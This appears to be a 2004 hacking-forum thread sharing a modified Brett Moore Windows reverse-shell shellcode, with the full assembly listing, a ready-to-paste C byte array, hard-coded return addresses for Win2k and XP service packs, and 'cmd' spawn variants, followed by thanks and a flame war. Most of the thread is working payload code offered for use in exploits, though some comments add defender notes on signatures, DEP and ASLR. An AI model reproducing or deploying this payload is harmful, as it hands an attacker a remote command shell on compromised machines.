101
Tested working on:
Win2k SP4 Server
Win2k SP4 Pro.
WinXP SP1 Pro.
WinXP SP1a Pro.
WinXP SP2 Pro.
and more prolly!

This nice piece of code for coders restricted in space smile.gif, by Brett Moore, with some small modifications by me to make it stable across Windows platforms.
Originally modded for the netcat exploit
{
QUOTE(101)
QUOTE(Anarchiste)

W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again

That's more to Brett Moore thos thanx , I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list and I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port , dunno why he made it like but it was bugging, that compare string "reajusted" to a stable byte works fine) .

Else, to answer your question: his shellcode does a lot of loops to scan the memory and find every API address needed, such as the MSVCRT.system() call which calls "cmd" once it has found the connect() call. Nothing much beyond some other existing shellcodes, but nicely coded to be small, thanx again Brett Moore!

}
, it will be prolly used in some more exploits,
enjoy wink.gif

bmoore.asm
CODE

;*********************************** Christmas Shells***************************************
; Callback Shell.
; Directly set std handles and call system()
;
; 220 (DCh) bytes
;
; its not code, its antic0de
; and it works now too %-)
; Left it in tasm format.
; tasm32 -ml /m5 bmoore.asm
; tlink32 -Tpe -c -x bmoore.obj ,,, import32
;
;*********************************** Christmas Shells***************************************
; Jimminy jellicas its been jimplemented.
;  Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals
;  All the o/s peeps who know whats what.
;********************************************************************************************
;//bmoore
;
; Tested working on Win2k SP4 Server,Pro and WinXP SP1a Pro Eng.
;//class101
.586p                                   ; Pentium instruction set, privileged forms allowed
locals                                  ; TASM: enable procedure-local labels (none are used below)

.model flat, stdcall
extrn ExitProcess:PROC                  ; declared but never called anywhere in this listing
extrn WSAStartup:PROC                   ; used only by the test harness (start:)
extrn WSACleanup:PROC

.data
wsadescription_len equ 256
wsasys_status_len equ 128

; Hand-laid WSADATA for the harness's WSAStartup() call.  lpVendorInfo is a
; word here while the real structure ends with a 4-byte pointer at an aligned
; offset, so this struct appears a few bytes shorter than what WSAStartup()
; fills in -- probably harmless for a test build, but it is not an exact WSADATA.
WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends

wsadata WSAdata <?>

.code
;****************************************************************************
; Winsock + copy to stack code
;****************************************************************************
start:
; Test harness (not part of the payload): bring Winsock up, then copy the
; bytes realstart..codeend onto the stack and jump to them, so the payload
; runs position-independent from writable+executable memory the way it
; would inside an exploit.  Nothing in this stub is position independent.

push    offset wsadata
push    0101h                           ; request Winsock 1.1
call    WSAStartup
or      eax, eax                        ; 0 = success
jz      winsock_found
jmp     codeend                         ; on failure this appears to run off the end of .code; ExitProcess is declared but never called

winsock_found:

mov ebx,offset realstart                ; source cursor
sub esp,400h                            ; 1 KiB of stack for the copy (payload is 220 bytes per the header)
mov eax,esp                             ; destination cursor

Copyit:

mov cl,byte ptr [ebx]
mov byte ptr [eax],cl
inc eax
inc ebx
cmp ebx,offset codeend
jle Copyit                              ; signed compare on addresses, inclusive: the byte at codeend is copied too
jmp esp                                 ; execute from the stack -- exactly what DEP/NX is meant to stop

;****************************************************************************
; This is the start of the shell code
;****************************************************************************

realstart:
; ---------------------------------------------------------------------------
; Payload proper: the bytes the harness copies to the stack.  scode[] in the
; C listing further down is this span up to the nop before `call WSACleanup`.
; Register roles once over_data is reached:
;   edi = address of the `mov esi,7ffdf00ch` byte (GetPC); afterwards the
;         write cursor of the resolved-address table that overwrites those bytes
;   ebx = cursor walking the name/hash table backwards from its end
;   edx = base of the module currently being searched (kernel32 -> WS2_32 -> MSVCRT)
;   ebp = frame over three pushed export-table pointers ([ebp-4] functions,
;         [ebp-8] names, [ebp-0ch] ordinals); after Done_Finding, the system() address
; Defender notes: the PEB is read from the literal 7FFDF00Ch instead of
; fs:[30h], so the bytes BE 0C F0 FD 7F are a stable static indicator and the
; payload cannot work where the PEB is not at that address (ASLR).  It also
; rewrites its own prologue and runs from the stack, so it needs memory that
; is both writable and executable (blocked by DEP).  At runtime, the exploited
; process ends up with all three standard handles pointing at a socket and a
; cmd.exe child inheriting them.
; ---------------------------------------------------------------------------

jmp over_data
sockdat db 02h,01h,00h,065h              ; sockaddr_in: family word 0102h until the 01h is patched to 00h below (-> 0002h), then port 0065h in network byte order
        db 07fh,00h,00h,01h              ; IPv4 address 127.0.0.1 (port and address are zeroed placeholders in the C copy)

; Name/hash table, consumed from the END backwards.  Each 01h byte is both a
; record separator and a spot that later gets decremented to 00h to
; NUL-terminate the module name before it; the dw values are 16-bit hashes of
; export names, computed by the routine at hashy:.  Identities below are
; inferred from how each resolved address is called, not from the hashes.
hashes db 01h
dw 364Ah                                 ; MSVCRT export: called last with a "cmd" string (system(), per the thread)
db "MSVCRT",01
dw 422Ah                                 ; WS2_32 export called with 6 args (2,1,0,0,0,0) -- WSASocketA-shaped
dw 8AD4h                                 ; WS2_32 export called with (socket, &sockdat, len) -- connect-shaped
db "WS2_32",01
dw 817Ch                                 ; kernel32 export called first at Done_Finding with nothing pushed for it; not recoverable from the listing
dw 4E2Ch                                 ; kernel32 export called with a module-name string -- LoadLibraryA-shaped

over_data:

   push 0ACC3575Fh                       ; bytes 5F 57 C3 AC = pop edi / push edi / ret: a 4-byte GetPC stub
call esp                                 ; runs the stub on the stack; edi = address of the next instruction
mov  esi,7ffdf00ch                       ; assumed PEB+0Ch (Ldr) at the conventional Win2k/XP PEB address -- hard-coded, see header note
lodsd                                    ; eax = PEB->Ldr
push  dword ptr [esi]                    ; saves PEB+10h (ProcessParameters); popped into edi at Done_Finding
mov  esi,[eax + 1ch]                     ; Ldr+1Ch: InInitializationOrderModuleList.Flink
lodsd                                    ; eax = second entry of that list
mov  edx,[eax + 08h]                     ; its DllBase -- kernel32.dll on Win2k/XP, where it follows ntdll in that list
push -8                                  ; [edi+ebp] offset of the first resolved address (table is 8 bytes per module)
lea ebx,[edi-8]                          ; ebx -> last byte of the hash table (high byte of 4E2Ch)

LookupFunctions:
; Entry: edx = module base, top of stack = the -8/-16 slot that becomes ebp.
; Pushes the three export-directory arrays (as VAs) so they can be reached via ebp.

push  esp
pop  ebp                                 ; ebp = esp
mov ecx,dword ptr [edx + 3ch]            ; e_lfanew
mov  esi,dword ptr [ecx + edx + 78h]     ; DataDirectory[0] (export table) RVA
lea  esi,dword ptr [esi + edx + 1ch]     ; &ExportDirectory.AddressOfFunctions
mov  cl,3                                ; only cl is written: relies on e_lfanew < 100h so that ecx == 3

StoreAddress:

   lodsd
add  eax,edx                             ; RVA -> VA
push  eax                                ; [ebp-4] functions, [ebp-8] names, [ebp-0ch] ordinals
loop  short StoreAddress

SearchStart:
; One hash: scan AddressOfNames linearly, hashing each name until one matches [ebx].

dec  ebx                                 ; ebx -> low byte of the next (earlier) hash word
mov  esi,dword ptr [ebp - 8]             ; esi = AddressOfNames
xor  eax,eax
push  eax                                ; scratch slot, discarded by the `pop esi` below

Search:

push  eax                                ; save name index
   lodsd
   add  eax,edx                          ; eax = name string VA
xor  ecx,ecx

hashy:
; 16-bit hash: cx += word at p; cl += byte at p; p++ until the next byte is < 1
; (NUL; the compare is signed, which is fine for ASCII export names)

add  cx,word ptr [eax]
add  cl,byte ptr [eax]
inc  eax
cmp  byte ptr [eax],01
jge  hashy
pop  eax
inc  eax                                 ; eax = index + 1
cmp  cx,[ebx]
jne  Search
pop  esi                                 ; discard the scratch slot
xchg  esi,eax                            ; esi = index + 1, eax = 0 (so the lodsw below leaves eax zero-extended)
dec  esi
shl     esi,1
   add     esi,dword ptr [ebp - 0ch]     ; &AddressOfNameOrdinals[index]
   lodsw
   shl     eax,2
   add     eax,dword ptr [ebp - 4h]      ; &AddressOfFunctions[ordinal]
xchg  esi,eax
lodsd
   add     eax,edx                       ; function VA
stosd                                    ; append to the table at edi: overwrites the already-executed prologue
                                         ; (by my count the five stores cover exactly the 20 bytes from `mov esi` to `lea`)
dec  ebx
cmp  byte ptr [ebx],01h                  ; 01h = no more hashes for this module
jne short SearchStart
leave                                    ; drop the three pointers; ebp = the -8/-16 value
dec  byte ptr [ebx]                      ; 01h -> 00h: NUL-terminates the 6-letter module name before it
sub  ebx,06h                             ; ebx -> first char of that name
;//bmoore
cmp  byte ptr [ebx-1],01h                ; 01h before the name = table exhausted (for the last record this is sockdat+1, the byte class101 re-pointed the check at per the thread)
je  short Done_Finding
;//class101
push  ebx                                ; LoadLibraryA-shaped call through [edi+ebp] = first table entry
call  dword ptr [edi + ebp]
xchg  edx,eax                            ; edx = base of the module just loaded
push  -16                                ; table grew by 8, so the first entry is now at edi-16
dec  ebx
jne  short LookupFunctions               ; ebx is a code pointer and never reaches 0: effectively unconditional
;//bmoore
nop                                      ; six bytes of filler; not executed on the normal path
nop
nop
nop
nop
nop
;//class101
Done_Finding:
; ebx = sockdat+2, edi = end of the 5-entry address table, eax = the MSVCRT address.

xchg  eax,ebp                            ; ebp = system() address for the final call
call  [EDI - 10h]                        ; second kernel32 function (hash 817Ch); the saved ProcessParameters beneath must survive it
xor  ecx,ecx
push ecx                                 ; args (2, 1, 0, 0, 0, 0) -> WSASocketA-shaped call
push ecx
push ecx
push ecx
inc  ecx
push ecx
inc  ecx
push  ecx
call [EDI - 08h]                         ; eax = socket
xchg  ecx,edi                            ; ecx = table end (edi is about to be reused)
pop  edi                                 ; edi = ProcessParameters saved at the start
add  edi,18h                             ; +18h/+1Ch/+20h: StandardInput/Output/Error per the "set std handles" header comment
stosd                                    ; all three std handles := the socket, so the child inherits them
stosd
stosd
dec ebx                                  ; ebx = sockdat+1
dec byte ptr [ebx]                       ; 01h -> 00h: sin_family word becomes 0002h
dec ebx                                  ; ebx = &sockdat
push ebx                                 ; namelen (the pointer value doubles as a large-enough length)
push ebx                                 ; &sockaddr_in
push   eax                               ; socket
call [ecx - 0ch]                         ; connect-shaped call (hash 8AD4h)
mov eax,1656E64h                         ; "cmd\0" built as 01656E64h - 01010101h to keep a NUL out of the payload bytes
sub eax,01010101h
push eax
push esp                                 ; char* to the "cmd" just pushed
call ebp                                 ; system("cmd"): cmd.exe runs with stdin/out/err on the socket
nop
call    WSACleanup                       ; harness only: not in scode[], and as a relative call it most likely does not reach WSACleanup from the stack copy

codeend:

   end     start
;//bmoore
---------EOF


C Format
CODE

/* Raw bytes of the bmoore.asm listing above, from realstart up to and
 * including the nop that precedes `call WSACleanup`; the loader stub and
 * the WSACleanup call are not part of it.  Bytes 4-5 and 6-9 are the
 * sockaddr_in port and address fields (zeroed here), so a static signature
 * should not anchor on them; the name/hash table that follows ("\x01\x4A\x36"
 * ... "MSVCRT" ... "WS2_32" ...) and the hard-coded PEB load
 * "\xBE\x0C\xF0\xFD\x7F" are the parts that stay constant between copies. */
char scode[] =
"\xEB\x21\x02\x01"
"\x00\x00" //port
"\x00\x00\x00\x00"  //ip
"\x01\x4A\x36\x4D\x53\x56"
"\x43\x52\x54\x01\x2A\x42\xD4\x8A\x57\x53\x32\x5F\x33\x32\x01\x7C"
"\x81\x2C\x4E\x68\x5F\x57\xC3\xAC\xFF\xD4\xBE\x0C\xF0\xFD\x7F\xAD"
"\xFF\x36\x8B\x70\x1C\xAD\x8B\x50\x08\x6A\xF8\x8D\x5F\xF8\x54\x5D"
"\x8B\x4A\x3C\x8B\x74\x11\x78\x8D\x74\x16\x1C\xB1\x03\xAD\x03\xC2"
"\x50\xE2\xFA\x4B\x8B\x75\xF8\x33\xC0\x50\x50\xAD\x03\xC2\x33\xC9"
"\x66\x03\x08\x02\x08\x40\x80\x38\x01\x7D\xF5\x58\x40\x66\x3B\x0B"
"\x75\xE8\x5E\x96\x4E\xD1\xE6\x03\x75\xF4\x66\xAD\xC1\xE0\x02\x03"
"\x45\xFC\x96\xAD\x03\xC2\xAB\x4B\x80\x3B\x01\x75\xC6\xC9\xFE\x0B"
"\x83\xEB\x06\x80\x7B\xFF\x01\x74\x10\x53\xFF\x14\x2F\x92\x6A\xF0"
"\x4B\x75\x9B\x90\x90\x90\x90\x90\x90\x95\xFF\x57\xF0\x33\xC9\x51"
"\x51\x51\x51\x41\x51\x41\x51\xFF\x57\xF8\x87\xCF\x5F\x83\xC7\x18"
"\xAB\xAB\xAB\x4B\xFE\x0B\x4B\x53\x53\x50\xFF\x51\xF4\xB8\x64\x6E"
"\x65\x01\x2D\x01\x01\x01\x01\x50\x54\xFF\xD5\x90";


enjoy!
extreme
You are a pro.. Thank you for this usefull tool...
Maybe next time, you could make some kind of HTTP download shell, which would be small, stable, and wouldn't create files on desktop, like shellcode from JPEG exploit does...
Anarchiste
W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again
BuzzDee
gr8 work 101!


to anarchiste:
this should answer ur question:

CODE
/* Fixed return addresses into kernel32.dll / msvcrt.dll for the named
 * service packs (no address randomisation on those systems).  The
 * build-specific values are why such an exploit has to be re-pinned per
 * OS version and why ASLR breaks it outright.  "file://" is a forum
 * artefact for the "//" comment marker. */
char jmpebx[]="\x73\x1c\x57\x7c"; file://JMP EBX - kernel32.dll - Win2k SP4 Server,Pro English
char popopret[]="\xb1\x2c\xc2\x77"; file://POP,POP,RET - msvcrt.dll - WinXP SP2,SP1a,SP1 Pro English - I finally found out XP exploitation;<


greetz
101
QUOTE(Anarchiste @ Dec 27 2004, 12:11 PM)
W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again
*



That's more to Brett Moore thos thanx , I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list and I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port , dunno why he made it like but it was bugging, that compare string "reajusted" to a stable byte works fine) .

Else to answer to your question , his shellcode does a lot of loops to scan the memory and find every api address needed as the MSVCRT.system() call wich call "cmd" once it found Connect() call. Nothing much as some other existing shellcodes , but nicely coded to be small , thanx again brett moore ! smile.gif

nb: sorry for my crap english , i know tongue.gif
Anarchiste
QUOTE(BuzzDee @ Dec 27 2004, 12:20 PM)
to anarchiste:
this should answer ur question:

CODE
char jmpebx[]="\x73\x1c\x57\x7c"; file://JMP EBX - kernel32.dll - Win2k SP4 Server,Pro English
char popopret[]="\xb1\x2c\xc2\x77"; file://POP,POP,RET - msvcrt.dll - WinXP SP2,SP1a,SP1 Pro English - I finally found out XP exploitation;<


greetz
*



My question was about the tech to find api adress needed, and not any exploit, your quote is about one special exploit, i know the tech to make an exploit universal, but there is different way for a shellcode to be universal, Brett Moore use loop scan, lsd use a different way, similar but different, basing on the pattern MZ, correct me if i'm wrong, but thw to reply wink.gif

QUOTE(101 @ Dec 27 2004, 12:34 PM)
QUOTE(Anarchiste @ Dec 27 2004, 12:11 PM)
W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again
*



That's more to Brett Moore thos thanx , I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list and I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port , dunno why he made it like but it was bugging, that compare string "reajusted" to a stable byte works fine) .

Else to answer to your question , his shellcode does a lot of loops to scan the memory and find every api address needed as the MSVCRT.system() call wich call "cmd" once it found Connect() call. Nothing much as some other existing shellcodes , but nicely coded to be small , thanx again brett moore ! smile.gif

nb: sorry for my crap english , i know tongue.gif
*



Yeah!Thx to Brett Moore!but thx you to for your interesting release, i don't use -e switch on netcat, i prefer code my tools, but i will take a look wink.gif ...sorry for my crap english too tongue.gif
101
QUOTE(101)
QUOTE(Peter Winter-Smith)

Hi,

Also, 'cmd&', system() will execute cmd.exe, and will treat all following
the ampersand as a following set of commands, and ignore it while the
cmd.exe process exists :-)

-Peter

Yes you are right , end if I remember I already tested this way but its not
stable accross all windows platforms, its as the Brett Moore original post
with the char \x20, for example, if I test on win2k sp4 server it works
fine, XP works fine, but it fail on Win2k SP4 Professional edition.
You can test yourself I just made the tests several times smile.gif
The old way suggested is working on all OS mentionned , sure it takes 6
bytes more than your suggestion , but much stable wink.gif

Cheers and thanx anyway for notify me.


Thus to say you can of course use the first way suggested by Brett Moore
CODE

; Call system() -- Brett Moore's original 5-byte form: "cmd" followed by a
; space (20h).  The thread reports this 214-byte variant failing on Win2k SP4
; Professional, which is why the 220-byte listing above builds "cmd\0" with
; mov/sub instead.
push  20646D63h ; Push cmd"\x20" on stack, null exists from above
push  esp   ; Location to cmd
call  ebp   ; Call system()


or Peter Winter-Smith
CODE

; Call system() -- Peter Winter-Smith's variant: "cmd&" (26h), so cmd.exe
; treats whatever follows the ampersand as a further command list.  Same
; size as the form above and, per the thread, the same Win2k Pro instability.
push  26646D63h ; Push cmd"\x26" on stack, null exists from above
push  esp   ; Location to cmd
call  ebp   ; Call system()


You can get the shellcode down to 214 bytes, but it will fail on every Win2k Professional edition. I haven't found out why yet; the old way suggested by Brett Moore is still better for me, 6 more bytes and much more stable smile.gif
Anarchiste
It's nice to know that, thx for info tongue.gif
guy12
QUOTE
You are a pro.. Thank you for this usefull tool...


yes a pro in code ripping wink.gif

everywhere i read you lame postings, with 1 year old codes!
everybody knows this shellcode....so don't waste your time
101
QUOTE(101)
I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list


Looks like guy12, you are a retarded wich dont know to read. I have already mentionned 10000x times this is Brett Moore shellcode.
Now I have a suggestion to you , take the shellcode from the mailing list , build the netcat exploit with (of course your own exploit), do all this working then we will speak, else you have successfully submitted a Poc on your stupidity there smile.gif

QUOTE(101)
I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port...


I guess so that you are a noob and you not tried the buggy shellcode into an exploit but only compiled into a win32 binary.
Sorry for owning you take it nicely smile.gif

Bye
guy12

QUOTE
I guess so that you are a noob and you not tried the buggy shellcode into an exploit



what??

i think i waste my time with you ...

QUOTE
--------------------

Don't forget that netcat 1.10 is vulnerable hat-squad.com/en/000142.html
--------------------
Don't forget to use netcat v1.11 vulnwatch.org/netcat
--------------------
Realtime Security News from 27 websites, 47 rsslinks => #n3ws (EFnet)
--------------------


because you are too narcissistically........

why do you add such a signature ??
do you think is so hard to code a simple bof...

it is always the same overflow a seh/or ret

then jump to a j mp reg or pop pop reg to the shellcode

and ?? i and many people have written a few exploits ,too, but nobody adds a sig. under every post with " HEY I CAN CODE A SIMPLE POC" ...

maybe someday you grow up...you don't need to answer , it is ok .....
101
I simply told you to post a code, you answer me the color of my hairs,
discussion closed for me .

Bye!!!
Anarchiste
QUOTE(guy12 @ Dec 30 2004, 03:31 PM)
QUOTE
I guess so that you are a noob and you not tried the buggy shellcode into an exploit



what??

i think i waste my time with you ...

QUOTE
--------------------

Don't forget that netcat 1.10 is vulnerable hat-squad.com/en/000142.html
--------------------
Don't forget to use netcat v1.11 vulnwatch.org/netcat
--------------------
Realtime Security News from 27 websites, 47 rsslinks => #n3ws (EFnet)
--------------------


because you are too narcissistically........

why do you add such a signature ??
do you think is so hard to code a simple bof...

it is always the same overflow a seh/or ret

then jump to a j mp reg or pop pop reg to the shellcode

and ?? i and many people have written a few exploits ,too, but nobody adds a sig. under every post with " HEY I CAN CODE A SIMPLE POC" ...

maybe someday you grow up...you don't need to answer , it is ok .....
*



Encore un qui a fait une overdose de buche glacée...

101 share his knowledge, apparently you are not for full disclosure, its your right, but i think someone must be reward for his work, so if you open the discussion, give us an exemple of your skills, or shut your mouse(i don't want be censured tongue.gif ), maybe you are an elite, so this forum isn't interesting for you apparently.
Have a nice day, 31337 (Wah0o! i saw an elite!! damn!I have an orgasm!)
u533m3n0t
Guy12,
Didn't your mother teach you that if you don't have anything constructive or nice to say then don't say it? It's very easy to criticize. Takes effort to improve things or contribute. I hope that you are able to find that within you which is so weak you need to flame others to make yourself feel better. Good luck.